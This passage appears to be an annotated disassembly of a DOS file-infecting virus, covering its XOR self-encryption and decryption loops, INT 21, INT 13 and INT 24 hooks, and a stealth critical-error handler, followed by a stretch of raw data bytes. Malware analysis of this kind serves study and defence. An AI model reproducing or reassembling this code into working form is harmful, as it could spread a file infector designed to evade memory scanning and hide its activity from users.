3411:0E73 E811F3         CALL   0187            ; SHARK1 - rest regs internal
;  Encryption
;  XORs every fifth byte from CS:0028, 0287h times. The same loop at
;  0E93 undoes it. A memory scan for the plain body can miss the
;  resident copy while it is in this state.
3411:0E76 53             PUSH	BX 
3411:0E77 51             PUSH	CX 
3411:0E78 BB2800         MOV	BX,0028 
3411:0E7B B98702         MOV	CX,0287 
3411:0E7E 2E80370B       XOR	Byte Ptr CS:[BX],0B 
3411:0E82 83C305         ADD	BX,+05 
3411:0E85 E2F7           LOOP	0E7E 
3411:0E87 59             POP	CX 
3411:0E88 5B             POP	BX 
3411:0E89 EB9A           JMP	0E25 
;  I N T 2 1 / T S R  hook
;  The byte at CS:0028 is tested with OR ...,00 (value unchanged, flags
;  set). Zero is taken to mean "not encrypted" and skips the loop.
3411:0E8B 2E800E280000   OR     Byte Ptr CS:[0028],00 
3411:0E91 7413           JZ	0EA6 
;  Memory was encrypted, so decrypt it. Then call our
;  INT 21 TSR, the TROUT2 function. Only every fifth byte is
;  encrypted, to save time.
;  BX and CX are preserved. The loop mirrors the one at 0E76-0E88.
3411:0E93 53             PUSH	BX 
3411:0E94 51             PUSH	CX 
3411:0E95 BB2800         MOV	BX,0028 
3411:0E98 B98702         MOV	CX,0287 
3411:0E9B 2E80370B       XOR	Byte Ptr CS:[BX],0B 
3411:0E9F 83C305         ADD	BX,+05 
3411:0EA2 E2F7           LOOP	0E9B 
3411:0EA4 59             POP	CX 
3411:0EA5 5B             POP	BX 
3411:0EA6 E9F3F4         JMP    039C            ; TROUT2
;  Encryption of the body around the file write (called from PIKE1).
;  XORs 0D58h bytes from CS:0028, issues the INT 21 call prepared by the
;  caller (PIKE1 sets AH = 40), then jumps to the decryptor at 0EFE,
;  which applies the same XOR again. The body is thus stored encrypted
;  in the file and is plain in memory only outside this call. The key
;  byte shown is the value in this memory image.
3411:0EA9 51             PUSH	CX 
3411:0EAA 53             PUSH	BX 
3411:0EAB BB2800         MOV	BX,0028 
3411:0EAE B9580D         MOV	CX,0D58 
3411:0EB1 2E80371B       XOR	Byte Ptr CS:[BX],1B 
3411:0EB5 43             INC	BX 
3411:0EB6 E2F9           LOOP	0EB1 
3411:0EB8 5B             POP	BX 
3411:0EB9 59             POP	CX 
3411:0EBA E894F2         CALL	0151 
3411:0EBD EB3F           JMP    0EFE
;  NOTE(review): the first four lines look mis-aligned by one byte.
;  Starting at 0EC0, the bytes 2E 8F 06 41 0E decode as POP CS:[0E41],
;  which pairs with the POP CS:[0E43] below and the JMP FAR CS:[0E41] at
;  the end. Offset 0D90, installed for INT 13 at 0D61, plus 0130h also
;  gives 0EC0. Read this way the routine is the temporary INT 13 hook:
;  it pops the caller's IP, CS and FLAGS, clears carry in the flags
;  image, and calls the entry in [0E2D] directly unless [0EDA] is already
;  set. A carry result increments [0EDA], and the routine returns to the
;  caller with carry set.
3411:0EBF B82E8F         MOV	AX,8F2E 
3411:0EC2 06             PUSH	ES 
3411:0EC3 41             INC	CX 
3411:0EC4 0E             PUSH	CS 
3411:0EC5 2E8F06430E     POP	CS:[0E43] 
3411:0ECA 2E8F06DB0E     POP	CS:[0EDB] 
3411:0ECF 2E8326DB0EFE   AND	Word Ptr CS:[0EDB],-02 
3411:0ED5 2E803EDA0E00   CMP	Byte Ptr CS:[0EDA],00 
3411:0EDB 7511           JNZ	0EEE 
3411:0EDD 2EFF36DB0E     PUSH	CS:[0EDB] 
3411:0EE2 2EFF1E2D0E     CALL	FAR CS:[0E2D] 
3411:0EE7 7306           JNB	0EEF 
3411:0EE9 2EFE06DA0E     INC	Byte Ptr CS:[0EDA] 
3411:0EEE F9             STC	 
3411:0EEF 2EFF2E410E     JMP    FAR CS:[0E41]
;  NOTE(review): the next four lines also look mis-aligned. From 0EF5 the
;  bytes 32 C0 / 2E C6 06 DA 0E 01 / CF decode as XOR AL,AL,
;  MOV Byte Ptr CS:[0EDA],01 and IRET. Offset 0DC5, installed for INT 24
;  at 0D70, plus 0130h gives 0EF5. That would make it a critical-error
;  handler that returns AL = 0 and sets the error flag, so no DOS error
;  prompt appears during infection. Confirm.
3411:0EF4 8932           MOV	[BP+SI],SI 
3411:0EF6 C02EC606DA     SHR	Byte Ptr [06C6],DA 
3411:0EFB 0E             PUSH	CS 
3411:0EFC 01CF           ADD    DI,CX
;  Startup decryption of virus.
;  CALL/POP obtains the run-time offset of 0F01; subtracting 0DA9 gives
;  the start of the encrypted area (0158 in this listing). 0D58h bytes
;  are XORed with the key byte in the instruction at 0F09.
;  Afterwards the byte at [BX+00B3] is decremented. PIKE1 sets that flag
;  (CS:[0E33]) to 1 before a write, so zero means "called from PIKE1 via
;  0EA9" and the routine returns; otherwise control goes to TROUT.
;  This short decryptor is the only part of the body stored in plain
;  form, apart from the key byte that 0E5A appears to vary.
3411:0EFE E80000         CALL	0F01 
3411:0F01 5B             POP    BX              ; Get our offset
3411:0F02 81EBA90D       SUB	BX,0DA9 
3411:0F06 B9580D         MOV	CX,0D58 
3411:0F09 2E80371B       XOR	Byte Ptr CS:[BX],1B 
3411:0F0D 43             INC	BX 
3411:0F0E E2F9           LOOP	0F09 
3411:0F10 2EFE8FB300     DEC	Byte Ptr CS:[BX+00B3] 
3411:0F15 7403           JZ	0F1A 
3411:0F17 E960F4         JMP    037A            ; TROUT
3411:0F1A C3             RET	 
                        DB      ' FISH FI'
3411:0F20 4649
3411:0F23 0000
3411:0F25 0000
3411:0F27 00
3411:0F28 00            ; Drive code, 0 = A:, etc.
3411:0F29 3920          ; File time
3411:0F2B BE1C          ; File date
3411:0F2D F8007408      ; DWORD PTR
3411:0F31 0008
3411:0F33 3500
3411:0F35 0001353D      ; DWORD PTR to previous INT21 handler
3411:0F39 0033
3411:0F3B 353146
3411:0F3E 3A30
3411:0F40 34
3411:0F41 33382038      ; DWORD PTR
3411:0F45 30
3411:0F46 46
3411:0F47 43
3411:0F48 3131
3411:0F4A 2020
3411:0F4C 2020
3411:0F4E 2020
3411:0F50 2020
3411:0F52 20434D
3411:0F55 50
3411:0F56 2020
3411:0F58 2020
3411:0F5A 41
3411:0F5B 48
3411:0F5C 2C31
3411:0F5E 3120
3411:0F60 2020
3411:0F62 2020
3411:0F64 2020
3411:0F66 2020
3411:0F68 2020
3411:0F6A 3B20
3411:0F6C 46
3411:0F6D 6972737420
3411:0F72 6D
3411:0F73 61
3411:0F74 7463
3411:0F76 68EB08
3411:0F79 000B
3411:0F7B 350000
3411:0F7E 0435
3411:0F80 2100
3411:0F82 3335
3411:0F84 31463A
3411:0F87 3034
3411:0F89 334220
3411:0F8C 37
3411:0F8D 3430
3411:0F8F 44
3411:0F90 2020
3411:0F92 2020
3411:0F94 2020
3411:0F96 2020
3411:0F98 2020
3411:0F9A 204A5A
3411:0F9D 0930
3411:0F9F 3434
3411:0FA1 41
3411:0FA2 20F8
3411:0FA4 0100
3411:0FA6 8B7600
3411:0FA9 0010
3411:0FAB 350800
3411:0FAE 0835
3411:0FB0 3C00
3411:0FB2 3335
3411:0FB4 31463A
3411:0FB7 3034
3411:0FB9 334420
3411:0FBC 3830
3411:0FBE 46
3411:0FBF 43
3411:0FC0 3132
3411:0FC2 2020
3411:0FC4 2020
3411:0FC6 2020
3411:0FC8 2020
3411:0FCA 20434D
3411:0FCD 50
3411:0FCE 2020
3411:0FD0 2020
3411:0FD2 41
3411:0FD3 48
3411:0FD4 2C31
3411:0FD6 3220
3411:0FD8 2020
3411:0FDA 20
3411:0FDB 2020
3411:0FDD 2020          ; SS save (for EXE)
3411:0FDF 2020          ; SP save (for EXE)
3411:0FE1 20
3411:0FE2 3B20
3411:0FE4 4E
3411:0FE5 65
3411:0FE6 7874
3411:0FE8 206D61
3411:0FEB 7463
3411:0FED 68502B
3411:0FF0 0000
3411:0FF2 1335
3411:0FF4 0800
3411:0FF6 0B35
3411:0FF8 2100
3411:0FFA 3335
3411:0FFC 31463A
3411:0FFF 3034
3411:1001 3430
3411:1003 2037
3411:1005 3430
3411:1007 3820
3411:1009 2020
3411:100B 2020
3411:100D 2020
3411:100F 2020
3411:1011 2020
3411:1013 4A
3411:1014 5A
3411:1015 0930
3411:1017 3434
3411:1019 41